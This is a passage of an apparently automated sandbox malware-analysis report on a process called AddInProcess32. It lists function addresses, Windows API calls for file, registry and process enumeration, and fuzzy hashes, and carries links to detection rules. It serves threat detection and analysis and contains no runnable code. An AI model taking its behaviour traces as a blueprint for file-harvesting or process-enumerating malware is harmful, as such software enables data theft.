                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$PointerRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 3154509469-0
                                                                                                  • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                  • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                  • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                  • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                  Function 00414561 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                    • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                    • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                    • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                  • String ID:
                                                                                                  • API String ID: 4232544981-0
                                                                                                  • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                  • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                  • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                  • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                  Function 00444A54 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID:
                                                                                                  • API String ID: 3664257935-0
                                                                                                  • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                  • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                  • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                  • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                  Function 00413F27 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                    • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                  • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AddressProc$FileModuleName
                                                                                                  • String ID:
                                                                                                  • API String ID: 3859505661-0
                                                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                  • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                  • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                  Function 0040A2EF Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 2738559852-0
                                                                                                  • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                  • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                  • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                  • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                  Function 0040A30E Relevance: 1.5, APIs: 1, Instructions: 13fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FileWrite
                                                                                                  • String ID:
                                                                                                  • API String ID: 3934441357-0
                                                                                                  • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                  • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                  • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                  • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                  Function 00413D29 Relevance: 1.5, APIs: 1, Instructions: 13COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID:
                                                                                                  • API String ID: 3664257935-0
                                                                                                  • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                  • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                  • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                  • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                  Function 004096C3 Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 823142352-0
                                                                                                  • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                  • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                  • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                  • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                  Function 004096DC Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CreateFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 823142352-0
                                                                                                  • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                  • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                  • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                  • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                  Function 0040B04B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??3@
                                                                                                  • String ID:
                                                                                                  • API String ID: 613200358-0
                                                                                                  • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                  • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                  • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                  • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                  Function 004135E0 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID:
                                                                                                  • API String ID: 3664257935-0
                                                                                                  • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                  • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                  • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                  • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                  Function 0041493C Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: EnumNamesResource
                                                                                                  • String ID:
                                                                                                  • API String ID: 3334572018-0
                                                                                                  • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                  • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                  • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                  • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                  Function 0044DEA5 Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: FreeLibrary
                                                                                                  • String ID:
                                                                                                  • API String ID: 3664257935-0
                                                                                                  • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                  • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                  • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                  • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                  Function 0040AEBE Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: CloseFind
                                                                                                  • String ID:
                                                                                                  • API String ID: 1863332320-0
                                                                                                  • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                  • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                  • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                  • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                  Function 00414592 Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: Open
                                                                                                  • String ID:
                                                                                                  • API String ID: 71445658-0
                                                                                                  • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                  • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                                  • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                                  • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                                  Function 00409B98 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: AttributesFile
                                                                                                  • String ID:
                                                                                                  • API String ID: 3188754299-0
                                                                                                  • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                  • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                  • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                  • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                  Function 0041BE52 Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                  • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                                  • Opcode Fuzzy Hash: 519045b8856ea86e6d8d1e97e8a9a2cac293cdb0bbecd69caab4774d1a49c2e8
                                                                                                  • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                                  Function 004095D9 Relevance: 1.3, APIs: 1, Instructions: 66COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 004095FC
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                    • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                    • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 3655998216-0
                                                                                                  • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                  • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                                  • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                                  • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                                  Function 00445403 Relevance: 1.3, APIs: 1, Instructions: 60COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  • memset.MSVCRT ref: 00445426
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                  • String ID:
                                                                                                  • API String ID: 1828521557-0
                                                                                                  • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                  • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                                  • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                                  • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                                  Function 004068BF Relevance: 1.3, APIs: 1, Instructions: 59COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                                    • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                  • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: ??2@FilePointermemcpy
                                                                                                  • String ID:
                                                                                                  • API String ID: 609303285-0
                                                                                                  • Opcode ID: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                  • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                                                                                                  • Opcode Fuzzy Hash: cfa0e116d589173c1f74b587a6cbbf9e28bf831d76649fdc759f8710e9f20be5
                                                                                                  • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                                                                                                  Function 00406B90 Relevance: 1.3, APIs: 1, Instructions: 56COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: _wcsicmp
                                                                                                  • String ID:
                                                                                                  • API String ID: 2081463915-0
                                                                                                  • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                  • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                                  • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                                  • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                                  Function 00406214 Relevance: 1.3, APIs: 1, Instructions: 39COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
                                                                                                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 0000001D.00000002.2003175619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_29_2_400000_AddInProcess32.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                  • String ID:
                                                                                                  • API String ID: 2136311172-0
                                                                                                  • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                  • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                                  • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                                  • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                                  Function 0040AFCF Relevance: 1.3, APIs: 1, Instructions: 12COMMON
                                                                                                  Download Yara Rule
                                                                                                  APIs
